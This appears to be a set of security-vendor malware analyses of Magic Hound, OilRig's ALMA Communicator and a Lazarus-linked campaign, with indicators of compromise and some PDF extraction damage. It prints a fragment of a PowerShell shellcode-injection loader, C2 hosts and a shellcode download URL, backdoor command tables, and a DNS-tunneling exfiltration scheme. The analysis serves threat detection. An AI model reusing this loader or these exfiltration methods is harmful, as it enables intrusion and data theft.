($z.Length-1);$i++) {$w::memset([IntPtr]($rJr.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$rJr,0,0,0);for (;;){Start-sleep 60};';$e =
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($0o8e));$DKn = "-enc ";if([IntPtr]::Size -eq 8){$b32 = $env:SystemRoot +
"\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $b32 $DKn $e"}else{;iex "& powershell $DKn $e";}
The decoded command above builds a buffer that it uses to store shellcode and creates a thread to execute it. We found the command above within the source code of Magic Unicorn,
which was also used in the Magic Hound delivery documents. The shellcode executed by this command is the same as in the delivery documents as well, specifically taken from
Metasploit to obtain additional shellcode to execute using an HTTP request to the following URL:
http://www7.chrome-up[.]date/0m5EE
We are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload. However, as alluded to above, we believe that this adversary used
the open source Magic Unicorn tool to load a shellcode-based payload. The fact that the actor used Metasploit shellcode within the Unicorn generated PowerShell script leads us to
speculate that the ultimate payload of this attack is Meterpreter, which is a shellcode-based payload.
PUPY LOADER
Pupy comes with default loaders that run the RAT on a variety of different platforms, specifically Windows, OSX, Linux and We have seen the Magic Hound actors using both the 32-bit
and 64-bit DLL loaders that come with Pupy to infect Windows systems. We have gathered three samples of the default loader associated with this group and extracted the following
12/19
configurations:
SHA256 of Sample
Configuration
82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190
LAUNCHER_ARGS=[
host
www1.chrome-up[.]date:4443
obfs3
db453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f
LAUNCHER_ARGS=[
host
www1.chrome-up[.]date:4443
obfs3
7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73
LAUNCHER_ARGS=[
host
139.59.46[.]154:3543
obfs3
These configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2 servers. Also, the configurations show the use of the
obfs3
(The Threebfuscator) transport, which is an obfuscation method to hide the true TCP-based communications protocol. The
obfs3
is used in the Tor project and the specifics of this
transport can be found at the Tor Project.
MAGICHOUND.DROPIT
The Magic Hound campaign was also discovered using a custom dropper tool, which we have named MagicHound.DropIt.
The DropIt Trojan we analyzed is an executable that builds an embedded executable by decoding embedded blobs of base64 encoded data and concatenating them together in the
correct order. In all of the DropIt samples we collected, the dropper will then save the executable to the user
s %TEMP% folder and execute the file, specifically to one of the following
filenames:
%TEMP%\spp.exe
%TEMP%\sloo.exe
%TEMP%\spoo.exe
%TEMP%\vschos.exe
We have also seen Magic Hound using DropIt like a binder Trojan, specifically dropping a legitimate decoy executable along with the malicious executable as a payload. For example, we
analyzed a DropIt sample (SHA256: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which was saved to
%TEMP%\flash_update.exe
that was a legitimate Flash Player installer. We believe the Magic Hound campaign uses the DropIt Trojan to run legitimate applications that fit their social
engineering, which in the example above included coercing the victim into updating their Flash Player.
MAGICHOUND.RETRIEVER
We observed a DropIt sample installing another Trojan we call MagicHound.Retriever. At a high level, Retriever is a .NET downloader that downloads secondary payloads from servers
associated with Magic Hound. While the Trojan itself does not resemble the other Magic Hound tools, it does create a folder named
c:\temp
that the Magic Hound loader creates to store
its persistence executable, as previously discussed. The folder name is quite generic and by itself is not a great correlation point, however, this coupled with the shared infrastructure
makes a higher fidelity connection between the two.
The Retriever Trojan uses the following namespace:
using pcchekapp.grp.ammar.samaneh;
Android.The malware begins by creating a web service object and uses the following URL within its configuration:
http:// service.chrome-up[.]date:8080 /WebService.asmx
It then calls a function called
SetLog2
, which sets variables for the system
s IP address, MAC address and hostname. A password variable is available but unused in this sample. The
code will gather some information about the system, specifically the local IP address, MAC address, and the external IP address of the system. The code obtains the external IP address
via an HTTP request using to
http://checkip.dyndns.org/
and uses a regular expression to locate an IP address from the HTTP response.
Once these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which issues an HTTP POST requests that appears as:
As you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request. All subsequent interaction with the C2 server uses the same
SOAP web service, so we will not show all of the generated HTTP requests. Instead, we will refer to the specific SOAP action (see
SOAPAction
field in previous example, specifically
SetLog2
) that the Trojan requests from the C2 server and the response from the C2 server. After sending the C2 the system information, the malware then issues a second request for
GetHasAnything
, which will communicate with the C2 server and ask the server if it has a secondary binary for the Trojan to install.
If the C2 server provides any response to the
GetHasAnything
request, it then calls the
GetIdAbOne
SOAP method to obtain what we believe is a unique identifier for the system that
the Trojan will use for further interaction with the C2. After receiving this variable, the Trojan calls the
GetNameAbById
to obtain a base64 string that will be the filename written in a newly
created
c:\temp
(decoded from
YzpcdGVtcFw=
) folder. The Trojan will then call
GetAbById
, which the C2 will provide a base64 string for the contents for the file to write to c:\temp.
After obtaining the unique ID from the C2 server, the Trojan calls the
SetAbStatById
method to notify the C2 server of its status of
to notify the server it had successfully received the
filename and file data.
13/19
With the file written to the system, the Trojan calls the
GetishideAbById
SOAP action to determine whether or not the C2 server wishes to execute the newly dropped file in a hidden
window. This request is followed by a call to
GetisrunasAbById
to determine if the Trojan should use
runas
to execute the downloaded executable with elevated privileges, which would
display the UAC dialog for the user to click.
Unfortunately, we were unable to obtain a secondary payload from an active C2 server.
MAGICHOUND.LEASH
The Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. This tool was discovered when we observed a DropIt sample installing
a backdoor Trojan that used IRC for its C2 communications. The bot chooses a random name from 977 hardcoded possibilities, connects to an adversary owned IRC server and joins a
channel using the following IRC commands:
USER AS_a # # :des
NICK Conroy
JOIN :#kalk
Leash obtains its commands via private messages (PRIVMSG) sent from the adversary who must also be connected to the IRC server. The following commands are available:
Command
SubCommand
Description
Generates the following IRC client command that will be sent to the C2 server:
PRIVMSG :
8 LED= 20160124
KILL
Trojan disconnects from the IRC server and terminates itself
RESET
Trojan disconnects from the IRC server and runs the executable again
Obtains the Windows version and responds to the C2 with the following message
PRIVMSG :
Windows NT
Windows 95
Windows 98
Windows ME
Windows 2003
Windows XP
Windows 7
Windows Vista
Unkown os info
EXEC
Not supported
Creates a specified directory. The Trojan will respond to the C2 with
PRIVMSG : []
. The message sent to the C2 will be
dir is maked.
if successful or
dir is not maked
if unsuccessful.
MKDIR
Same as MD subcommand.
Removes a specified directory. The Trojan will respond to the C2 with
PRIVMSG : []
. The message sent to the C2 will be
dir is removed.
successful or
dir is not removed.
if unsuccessful.
Deletes a specified file. The Trojan will respond to the C2 with
PRIVMSG : []
. The message sent to the C2 will be
file is deleted.
if successful or
file
is not deleted.
if unsuccessful.
COPY
Not supported.
MOVE
Not supported.
Renames a specified file. The Trojan will respond to the C2 with
PRIVMSG : []
. The message sent to the C2 will be
file is renamed.
if successful or
file is not renamed.
if unsuccessful.
DRIVE
Lists the logical drives and the type, as well the total/free space of the fixed devices.
Calls GetModuleFileNameA function to obtain the path to the currently running executable and sends it to the C2 server.
!DWN
Downloads a file from a specified URL. Responds to the IRC server via PRIVMSG with
Download Success :FilePath=
or
Download Fail
unsuccessful.
!CMD
Trojan executes a command prompt command. The Trojan will save the output of the command to %TEMP%\win .txt and send the contents to the C2
server or
The length of Cmd result file is ziro!
if the command was unsuccessful.
Generates the following IRC client command that will be sent to the C2 server:
PRIVMSG : Hello ,my name is , Im ready my Computer Name is:
All of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that start with
or
. This suggests that the adversary
14/19
IRC nickname would need to have these prefixes to control the systems infected with this Trojan. The adversary could have used this name requirement as an added measure to make
sure other individuals did not join the IRC server and begin interacting with compromised systems.
15/19
16/19
17/19
MPKBot
We also found a second IRC bot called MPK (SHA256: d08d737fa59edbea4568100cf83cff7bf930087aaa640f1b4edf48eea4e07b19) using an IP that a Retriever sample was hosted on
as a C2 server instead. This MPK IRC bot is very similar to the MPK Trojan that used a custom C2 communications protocol, as discussed in the whitepaper by CheckPoint discussing a
threat group called Rocket Kitten. We believe this version of the MPK Trojan is based on the same code base, as both the IRC version and the one discussed in the above white paper
have considerable similarities from a behavior standpoint and both Trojan have direct code sharing between them.
From a behaviorial standpoint, both the IRC and custom protocol version of MPK save
tmp.vbs
and
tmp1.vbs
to the %TEMP% folder (both differed slightly but used the same variable
names within the script) in order to copy the Trojan to its final location and to execute it. Both variants need to be executed with the command line argument
to avoid continually
attempting to copy and execute the Trojan using the
tmp.vbs
and
tmp1.vbs
files. The two variants of MPK share the same registry key that the Trojan uses to automatically run each
time the system starts, specifically:
[HKLM and HKCU]\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer
Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file. The MPK IRC Bot monitors
active application windows and writes the title of the open window along with the logged keystrokes to a file at
%temp%\Save.tmp
. The MPK Trojan also monitors specifically for windows
that are likely to contain login forms for popular web-based email clients, such as titles that contain:
Gmail -
Yahoo
login
Sign In -
Outlook.com -
MPK will attempt to parse these window titles to identify the associated email address and record these to the log file using the following format:
/////////////
Mail Find
///////////
If the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the
Save.tmp
file in the following format:
+++++++++++++
Window=
+++++++++++++
The major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used. The IRC variant creates a mutex named
mpk1
and attempts to connect to an IRC
server at 45.58.37[.]142:6667. The MPK bot generates a random lowercase name and uses it to log into the IRC server. It then sends the following IRC commands:
NICK bxphzrjbxp
18/19
USER bxphzrjbxp bxphzrjbxp bxphzrjbxp bxphzrjbxp
To make sure it connected to the correct server, the Trojan checks for the message sent from the IRC server after the bot connects:
Welcome to the MpkNet IRC Network
The MPK bot does not join a specific IRC channel, instead sending private messages (PRIVMSG) to a user with the nick
. After connecting to the IRC server, the MPK bot sends
custom ping messages and provides an introduction via a
!Hello
message that contains the current logged in user of the infected host, if the user has administrator privileges, the
hostname, the UUID of the system, and operating system version. Figure 7 shows the initial private messages sent from the MPK bot to the
account on the C2 server.
Figure 7 Initial private messages sent from MPK to the IRC C2 server
The commands available within the MPK IRC bot are called via a jump table, rather than a switch statement used in the custom protocol variant of MPK. The IRC variant of MPK has a
command set (Table 2) that makes this an effective backdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate and interact
with the file system, to run arbitrary commands, and to download and execute additional tools on the system.
Command
Description
!Dir
Lists the contents of a specified directory
!Drives
Enumerates the storage drives attached to the system and their respective type.
!DeleteFile
Deletes a specified file
!NickChange
Changes the nickname that the Trojan uses to log into the C2 IRC server. Writes it to
nick435.tmp
for subsequent logins.
!ProcessList
List running processes, including their PID, parent PID, executable name and priority
!SendFileToServer
Uploads a specified file to the C2 server
!CaptureScreen
Takes a screenshot that it saves to a file and uploads to the C2 server.
!Hello
The Trojan introduces itself by sending the current username, if its an admin account or not, the computer name, the system UUID and the OS version.
!ProcessKill
Terminates a process based on PID
!RenameFileFolder
Renames a file or folder and returns a list of the containing folder to the C2 server.
!GetFileOfServer
Writes a file from the C2 server to a specified file
!ExecuteCommand
Uses the command prompt sub-process to execute commands and returns their results to the C2.
!ExeCuteFile
Executes a specified file using ShellExecuteA
!DeleteFileFolder
Deletes a file or a folder
!SendkeyLogToServer
Uploads the %TEMP%\Save.tmp file to the C2 server
!DeleteKeyloggerLog
Deletes the %TEMP%\Save.tmp file on the system
Table 2 Commands available within MPK IRC Bot
19/19
OilRig Deploys
ALMA Communicator
DNS Tunneling
Trojan
researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/
By Robert Falcone
November 8, 2017
Unit 42 has been closely tracking the OilRig threat group since May 2016. One technique
ve been tracking with this threat group is their use of the Clayslide delivery document as
attachments to spear-phishing emails in attacks since May 2016. In our April 2017 posting
OilRig Actors Provide a Glimpse into Development and Testing Efforts we showed how we
observed the OilRig threat group developing and refining these Clayside delivery documents.
Recently, we observed a new version of the Clayslide delivery document used to install a new
custom Trojan whose developer calls it
ALMA Communicator
. The delivery document also
saved the post-exploitation credential harvesting tool known as Mimikatz, which we believe the
threat actors will use to gather account credentials from the compromised system. While we
do not have detailed telemetry, we have reason to believe this attack targeted an individual at
a public utilities company in the Middle East.
New Clayslide Delivery Document
The most recent build of Clayslide operates in a similar way to its predecessors, as it initially
displays an
Incompatible
worksheet that states that the Excel file was created with a newer
version of Excel and the user needs to
Enable Content
to view the document. If the user
clicks
Enable Content
, a malicious macro will run that begins by displaying a hidden
worksheet that contains decoy contents, as seen in the following:
While the decoy is displayed to the victim, the malicious macro accesses data from specific
cells in the
Incompatible
worksheet that it concatenates to create an .HTA file, which it then
saves to %PUBLIC%\tmp.hta and opens with the mshta.exe application. The .HTA file
contains HTML that will run a VBScript that finally installs the malicious payload for this attack.
The payload installation process begins with the .HTA file creating a folder named
%PUBLIC%\{5468973-4973-50726F6A656374-414C4D412E-2}, to which it writes three files
with the following names:
SystemSyncs.exe
m6.e
The .HTA file contains two encoded executables that it will decode and write to m6.e and
SystemSyncs.exe. The .HTA file contains a base64 encoded configuration that it decodes and
saves to the cfg file, which the Trojan will use to obtain the C2 domain that it will use to
communicate with the threat actor. The C2 domain saved to the cfg file in this attack is
prosalar[.]com.
The SystemSyncs.exe file (SHA256:
2fc7810a316863a5a5076bf3078ac6fad246bc8773a5fb835e0993609e5bb62e) is a custom
Trojan created by the OilRig group called
ALMA Communicator
, which we will describe in
detail in the next section.
The
m6.e
file dropped by the .HTA file is a variant of Mimikatz (SHA256:
2d6f06d8ee0da16d2335f26eb18cd1f620c4db3e880efa6a5999eff53b12415c) tool. We have
seen the OilRig threat group using Mimikatz for credential gathering during its post-exploitation
activities, however, this is the first time we have observed the threat group delivering Mimikatz
during the delivery phase of the attack. We believe the Clayslide delivery document dropped
this additional tool based on the limitations of ALMA Communicator
s C2 channel, which we
will describe later in this report.
The VBScript in the .HTA file executes the SystemSyncs.exe payload and achieves persistent
execution by creating a scheduled task. Unlike past Clayslide documents that create a
scheduled task via the schtask application via the command prompt, the VBScript
programmatically creates the task using the Schedule.Service object. The scheduled task
created, as seen in Figure 1, shows that the payload will be executed every two minutes with
the command line argument
Lock
Figure 1 Scheduled task created by Clayslide to execute the ALMA Communicator payload
ALMA Communicator Trojan
The ALMA Communicator Trojan is a backdoor Trojan that uses DNS tunneling exclusively to
receive commands from the adversary and to exfiltrate data. This Trojan specifically reads in a
configuration from the cfg file that was initially created by the Clayslide delivery document.
ALMA does not have an internal configuration, so the Trojan does not function without the cfg
file created by the delivery document.
After reading in its configuration, the Trojan creates two folders for staging, named Download
and Upload. ALMA uses the Download folder to save batch files provided by the C2 server,
which it will eventually run. ALMA uses the Upload folder to store the output of the executed
batch files, which it will eventually exfiltrate to the C2 server.
ALMA Communicator uses DNS tunneling as its C2 communication channel using a specific
protocol that uses specially crafted subdomains to transmit data to the C2 server and specific
IPv4 addresses to transmit data from the C2 to the Trojan. The transmission of information
from the Trojan to the C2 server occurs through DNS requests to resolve specially crafted
subdomains on the configured C2 domain.
To build these specially crafted subdomains, the Trojan generates a random four-digit number
and concatenates a hardcoded string of ID. The Trojan then appends a unique identifier for the
compromised system to this string. To generate this unique identifier, the Trojan starts by
obtaining the system
s ProductId from the registry, specifically at
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId. If it cannot find this registry
key, it will use the hardcoded value 00000-00000-00000-00000. It then obtains the username
and concatenates an underscore followed by the product id string. The Trojan takes the MD5
hash of this string and uses it as the basis for the unique identifier for the compromised
system. It then appends the hardcoded -0-2D-2D string to finish the construction of the
subdomain used to beacon the C2 server. Figure 2 shows the structure of the domains that
ALMA communicator will send to the C2 server to receive data.
Figure 2 Domain used by ALMA communicator to receive data from the C2 server
To provide a better explanation of the unique identifier generated by ALMA communication,
s consider a test system with the username and product id create the string
Administrator_00000-00000-00000-00000, which results in an MD5 hash of
35ead98470edf86a1c5a1c5fb2f14e02. The Trojan will generate the unique identifier string
3d7f11b4 by taking the first, fifth, ninth, thirteenth, seventeenth, twenty first, twenty fifth and
twenty ninth characters from the MD5 hash and concatenating them together, as seen in
Figure 3.
Figure 3 How ALMA Communicator generates the unique identifier for the compromised
system
The C2 server will reply to the beacon DNS requests with IPv4 addresses within A records.
The Trojan will parse these requests for two specific IP addresses, one to mark the beginning
and one to mark the end of the transmission of data from the C2 to the Trojan. The two specific
IP addresses to mark the start and end of the data are:
Start
36.37.94.33 ($%^!)
End
33.33.94.94 (!!^^)
The C2 will respond to DNS queries between these two responses with IP addresses that the
Trojan will treat as binary data. During our analysis, we observed the following data being sent
from the C2 server to our analysis system, with $%^! and !!^^ representing the start and stop
markers for the data:
$%^!_DnsInit.bat@echo off & chcp 65001\r\necho
%userdomain%\\%username% 2>&1 & echo %computername% 2>&1 & echo
________________________________Task__________________________________
& schtasks /query /FO List /TN "Google_{50726F6A656374414C4D41-48747470}" /V | findstr /b /n /c:"Repeat: Every:" 2>&1
& schtasks /query /FO List /TN "Micro_{50726F6A656374414C4D41-446E73-2}" /V | findstr /b /n /c:"Repeat: Every:" 2>&1 & echo
______________________________________________________________________ !!^^
Based on the data sent back from the C2, the Trojan will create a file named _DnsInit.bat with
commands seen in the data. The Trojan stores the batch file in the Download folder. The
Trojan will then enumerate this folder and create a cmd.exe process with the path to the batch
script as a command line argument. The Trojan will add to the command line argument the
string
followed by the batch script
s filename with the .txt.Prc file extension to write the
output of the command to a text file in the Upload folder. Before running the process, the
following string to the end command line argument to delete the batch script upon execution:
\r\nDEL /f /q \
%~0\
|exit
The Trojan will then attempt to send the newly created file in the Upload folder that contains
the result of running the command. The DNS requests used to send this data has four fields
that are split up using a hyphen, which are:
1. Random four-digit number followed by static
string and the 10 character unique
system identifier
2. Number of DNS queries needed to send entire data stream
3. Maximum of 20 characters for 10 hexadecimal bytes of data to transmit
4. String of characters for hexadecimal bytes for filename transmitted
To better visualize the structure of a DNS query used to send data, the following is shows the
domain name that the Trojan will build to send data to its C2 server:
[random 4 digits]ID[unique identifier]-[number of DNS queries needed]-[string of hexadecimal
bytes for sent data]-[string of hexadecimal bytes for filename being sent].prosalar[.]com
For example, figure 4 is the first DNS query issued after our testing system ran the
_DnsInit.bat script provided by the C2 server mentioned above. As you can see, each DNS
request can only send 10 bytes of data at a time, requiring 29 outbound requests to transmit
the 289 bytes of output that was generated by the batch script.
Figure 4 Subdomain that ALMA Communicator attempts to resolve to transmit data to its C2
server
As you can surmise, ALMA Communicator
s C2 channel is rather limited when it comes to data
transfer. If an actor wished to use ALMA communicator to exfiltrate large files, it would result in
a very large number of outbound DNS requests, as each outbound request can only send 10
bytes at a time. Even more limiting is the data transmission from the C2 server to the Trojan,
which can only send 4 bytes per DNS request, as each IPv4 address is treated as data. We
believe this is the reason why the Clayslide delivery document saved the Mimikatz tool to the
system instead of having the actor download the tool to the system after a successful
compromise. Based on the 4-byte per DNS request limitation, the ALMA Communicator would
generate 189,568 DNS requests (not including the start and stop requests) to transmit the
758,272 byte Mimikatz tool to the system, which may be detected by security systems or
personnel.
Conclusion
The OilRig threat group continues to use their Clayslide delivery document in their attack
campaigns. The current variant of Clayslide also suggests that this group continues to develop
these delivery documents with new installation techniques to evade detection. This threat
group also continues to add new payloads to their toolset as well, with ALMA Communicator
being the most recent addition. Lastly, it appears that OilRig still prefers using DNS tunneling
for its C2 channel of choice, as ALMA Communicator, Helminth and ISMAgent all use this
technique for C2 communications.
Palo Alto Networks customers are protected by the following:
WildFire identifies ClaySlide delivery documents and ALMA Communicator samples as
malicious
Traps blocks the ALMA Communicator Trojan via Local Analysis and blocks the
Clayslide delivery document based on
Suspicious macro detected
AutoFocus customers can track these tools using the following tags:
Clayslide
ALMACommunicator
Mimikatz
Indicators of Compromise
f37b1bbf5a07759f10e0298b861b354cee13f325bc76fbddfaacd1ea7505e111 (Clayslide)
2fc7810a316863a5a5076bf3078ac6fad246bc8773a5fb835e0993609e5bb62e (ALMA
Communicator)
2d6f06d8ee0da16d2335f26eb18cd1f620c4db3e880efa6a5999eff53b12415c (Mimikatz)
prosalar[.]com
The Blockbuster Sequel
researchcenter.paloaltonetworks.com /2017/04/unit42-the-blockbuster-sequel/
By Anthony Kasza and Micah
Yates
4/7/2017
Unit 42 has identified malware with recent compilation and distribution timestamps that has code,
infrastructure, and themes overlapping with threats described previously in the Operation Blockbuster report,
written by researchers at Novetta. This report details the activities from a group they named Lazarus, their tools, and the techniques they use to
infiltrate computer networks. The Lazarus group is tied to the 2014 attack on Sony Pictures Entertainment and the 2013 DarkSeoul attacks.
This recently identified activity is targeting Korean speaking individuals, while the threat actors behind the attack likely speak both Korean and
English. This blog will detail the recently discovered samples, their functionality, and their ties to the threat group behind Operation Blockbuster.
Initial Discovery and Delivery
This investigation began when we identified two malicious Word document files in AutoFocus threat intelligence tool. While we cannot be certain
how the documents were sent to the targets, phishing emails are highly likely. One of the malicious files was submitted to VirusTotal on 6 March
2017 with the file name
.doc
. Once opened, both files display the same Korean language decoy document which appears to be the
benign file located online at
www.kuipernet.co.kr/sub/kuipernet-setup.docx
1/12
Figure 1 Dropped decoy document
This file (Figure 1) appears to be a request form used by the organization. Decoy documents are used by attackers who want to trick victims into
thinking a received file is legitimate. At the moment, the malware infects the computer, it opens a non-malicious file that contains content the
target expected to receive (Figure 2.) This serves to fool the victim into thinking nothing suspicious has occurred.
2/12
Figure 2 Spear Phishing Attack uses a decoy a file to trick the target
When these malicious files are opened by a victim, malicious Visual Basic for Applications (VBA) macros within them write an executable to disk
and run it. If macros are disabled in Microsoft Word, the user must click the
Enable Content
button for malicious VBA script to execute. Both
documents make use of logic and variable names within their macros, which are very similar to each other. Specifically, they both contain strings
of hex that when reassembled and XOR-decoded reveal a PE file. The PE file is written to disk with a filename that is encoded in the macro
using character substitution. Figure 3 shows part of the logic within the macros which is identical in both files.
3/12
Figure 3 Malicious document malicious macro source code
The Embedded Payload
The executable which is dropped by both malicious documents is packed with UPX. Once unpacked, the payload
(032ccd6ae0a6e49ac93b7bd10c7d249f853fff3f5771a1fe3797f733f09db5a0) can be statically examined. The compile timestamp of the sample is
March 2 nd, 2017, just a few days before one of the documents carrying the implant was submitted to VirusTotal.
The payload ensures a copy of itself is located on disk within the %TEMP% directory and creates the following registry entry to maintain
persistence if the system is shutdown
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\JavaUpdate ,
Value:%TEMP%\java.exe /c /s
It then executes itself with the following command line:
%TEMP%\java.exe /c %TEMP%\java.exe
The implant beacons to its command and control (C2) servers directly via the servers
IPv4 addresses, which are hard coded in the binary, no
domain name is used to locate the servers. The communications between the implant and the server highly resemble the
fake TLS
protocol
associated with malware tools used by the Lazarus group and described in the Operation Blockbuster report. However, the possible values of the
Server Name Indication (SNI) record within the CLIENT HELLO of the TLS handshake used by the implant differ from those described in the
4/12
report. The names embedded in the new sample and chosen for communications include:
twitter.com
www.amazon.com
www.apple.com
www.bing.com
www.facebook.com
www.microsoft.com
www.yahoo.com
www.join.me
The C2 servers contacted by the implant mimic the expected TLS server responses from the requested SNI field domain name, including
certificate fields such as the issuer and subject. However, the certificates
validity, serial number, and fingerprint are different. Figure 4 shows a
fake TLS session which includes the SNI record
www.join.me
destined for an IPv4 address which does not belong to Join.Me.
Figure 4 The use of
www.join.me
as an SNI record of a TLS handshake to an IPv4 address which does not host that domain name
Expanding the Analysis
Because the attackers reused similar logic and variable names in their macros, we were able to locate additional malicious document samples.
Due to the heavy reuse of code in the macros we also speculate the documents are created using an automated process or script. Our analysis
of the additional malicious documents showed some common traits across the documents used by the attackers:
1. Many, but not all, of the documents have the same author
2. Malicious documents support the ability to drop a payload as well as an optional decoy document
3. XOR keys used to encode embedded files within the macros seem to be configurable
4. All of the dropped payloads were compressed with a packer (the packer used varied)
Multiple testing documents which dropped and executed the Korean version of the Microsoft calc.exe executable, but contained no malicious
code, were also identified. This mirrors a common practice in demonstrating exploits of vulnerabilities. Interestingly enough, all of the test
documents identified were submitted to VirusTotal with English file names from submitters located in the United States (although not during US
working hours
). Despite the documents having Korean code pages, when executed they open decoy documents with the English text:
testteststeawetwetwqetqwetqwetqw
. These facts lead us to believe at least some of the developers or testers of the document weaponizing tool
may be English speakers.
While some of the documents identified carry benign payloads, most of the payloads were found to be malicious. A cluster of three malicious
documents were identified that drop payloads which are related via C2 domains. The payloads can be seen highlighted in Figure 5.
5/12
Figure 5 Related executables, their C2 domain names, their dropper documents, and the shared batch file
The two malicious payloads circled in Figure 5 write a batch script to disk that is used for deleting the sample and itself, which is a common
practice. The batch script dropped by the two payloads share a file name, file path, and hash value with a script sample
(77a32726af6205d27999b9a564dd7b020dc0a8f697a81a8f597b971140e28976). This sample is described in a 2016 research report by Blue
Coat discussing connections between the DarkSeoul group and the Sony breach of 2014.
The script
s (Figure 6) hash value will vary depending on the name of the file it is to delete. It also includes an uncommon label inside it of
L21024
. The file the script deletes is the payload which writes the script to disk. In the case of Figure 6, the payload was named
thing.exe
Figure 6 The contents of the shared batch script
Ties to Previous Attacks
In addition to the commonalities already identified in the communication protocols and the shared cleanup batch script use by implants, the
payloads also share code similarities with samples detailed in Operation Blockbuster. This is demonstrated by analyzing the following three
samples, which behave in similar ways:
6/12
032ccd6ae0a6e49ac93b7bd10c7d249f853fff3f5771a1fe3797f733f09db5a0
79fe6576d0a26bd41f1f3a3a7bfeff6b5b7c867d624b004b21fadfdd49e6cb18
520778a12e34808bd5cf7b3bdf7ce491781654b240d315a3a4d7eff50341fb18
We used these three samples to reach the conclusion that the samples investigated are tied to the Lazarus group.
First, these three samples all use a unique method of executing a shell command on the system. An assembly function is passed four strings.
Some of the strings contain placeholders. The function interpolates the strings and creates a system command to be executed. The following four
parameters are passed to the function:
xe /
c%s.e%sc \
%s > %s 2>&1\
These are used not only in the implant we investigated, but also in the two samples above. Additionally, many samples discussed in the
Operation Blockbuster report also made use of this technique. Figure 7 shows the assembly from the unpacked implant
(032ccd6ae0a6e49ac93b7bd10c7d249f853fff3f5771a1fe3797f733f09db5a0) delivered by our malicious document and shows the string
interpolation function being used.
7/12
Figure 7 The string interpolation function assembly with library names from
032ccd6ae0a6e49ac93b7bd10c7d249f853fff3f5771a1fe3797f733f09db5a0
Figure 8 shows the same string interpolation logic but within a different sample
(79fe6576d0a26bd41f1f3a3a7bfeff6b5b7c867d624b004b21fadfdd49e6cb18.) The instructions are the same except where the system calls are
replaced with DWORDs which brings us to a second similarity.
Figure 8 The string interpolation function assembly without library names from
79fe6576d0a26bd41f1f3a3a7bfeff6b5b7c867d624b004b21fadfdd49e6cb18
The second similarity ties this sample to a known Lazarus group sample
(520778a12e34808bd5cf7b3bdf7ce491781654b240d315a3a4d7eff50341fb18.) Upon execution, both samples set aside memory to be used as
function pointers. These pointers are assigned values by a dedicated function in the binary. Other functions in the binary call the function
pointers instead of the system libraries directly. The motivation for the use of this indirection is unclear, however, it provides an identifying
detection mechanism.
These two samples resolve system library functions in a similar yet slightly different manner. The sample known to belong to the Lazarus group
uses this indirect library calling in addition to a function that further obfuscates the function
s names using a lookup table within a character
substitution function. This character substitution aspect was removed in the newer samples. The purpose for removing this functionality between
the original Operation Blockbuster report samples and these newer ones is unclear. Figure 9 displays how this character substitution function
was called within the Lazarus group sample.
8/12
Figure 9 The character substitution function from 520778a12e34808bd5cf7b3bdf7ce491781654b240d315a3a4d7eff50341fb18 being called
SHA256 Hash
String
Interpolation
Function
System
Library
Obfuscation
Fake TLS
Label
Communications
032ccd6ae0a6e49ac93b7bd10c7d249f853fff3f5771a1fe3797f733f09db5a0
Initially
identified
payload
79fe6576d0a26bd41f1f3a3a7bfeff6b5b7c867d624b004b21fadfdd49e6cb18
Sample
identified to
be related
to initial
payload
Operation
Blockbuster
sample
520778a12e34808bd5cf7b3bdf7ce491781654b240d315a3a4d7eff50341fb18
Known
Operation
Blockbuster
sample
Figure 10: A comparison of features between samples
Final Thought
Overlaps in network protocols, library name obfuscation, process creation string interpolation, and dropped batch file contents demonstrate a
clear connection between the recent activity Unit 42 has identified and previously reported threat campaigns. Demonstrated by the malicious
document contents, the targets of this new activity are likely Korean speakers, while the attackers are likely English and Korean speakers.
It is unlikely these threat actors will stop attacking their targets. Given the slight changes that have occurred within samples between reports, it is
likely this group will continue to develop their tools and skillsets.
9/12
Customers using WildFire are protected from these threats and customers using AutoFocus can find samples from this campaign tagged as
Blockbuster Sequel.
Indicators of Compromise
Initial Malicious Documents
cec26d8629c5f223a120677a5c7fbd8d477f9a1b963f19d3f1195a7f94bc194b
ff58189452668d8c2829a0e9ba8a98a34482c4f2c5c363dc0671700ba58b7bee
Initial Payload
1322b5642e19586383e663613188b0cead91f30a0ab1004bf06f10d8b15daf65
032ccd6ae0a6e49ac93b7bd10c7d249f853fff3f5771a1fe3797f733f09db5a0 (unpacked)
Testing Malicious Documents
90e74b5d762fa00fff851d2f3fad8dc3266bfca81d307eeb749cce66a7dcf3e1
09fc4219169ce7aac5e408c7f5c7bfde10df6e48868d7b470dc7ce41ee360723
d1e4d51024b0e25cfac56b1268e1de2f98f86225bbad913345806ff089508080
040d20357cbb9e950a3dd0b0e5c3260b96b7d3a9dfe15ad3331c98835caa8c63
dfc420190ef535cbabf63436e905954d6d3a9ddb65e57665ae8e99fa3e767316
f21290968b51b11516e7a86e301148e3b4af7bc2a8b3afe36bc5021086d1fab2
1491896d42eb975400958b2c575522d2d73ffa3eb8bdd3eb5af1c666a66aeb08
31e8a920822ee2a273eb91ec59f5e93ac024d3d7ee794fa6e0e68137734e0443
49ecead98ebc750cf0e1c48fccf5c4b07fadef653be034cdcdcd7ba654f713af
5c10b34e99b0f0681f79eaba39e3fe60e1a03ec43faf14b28850be80830722cb
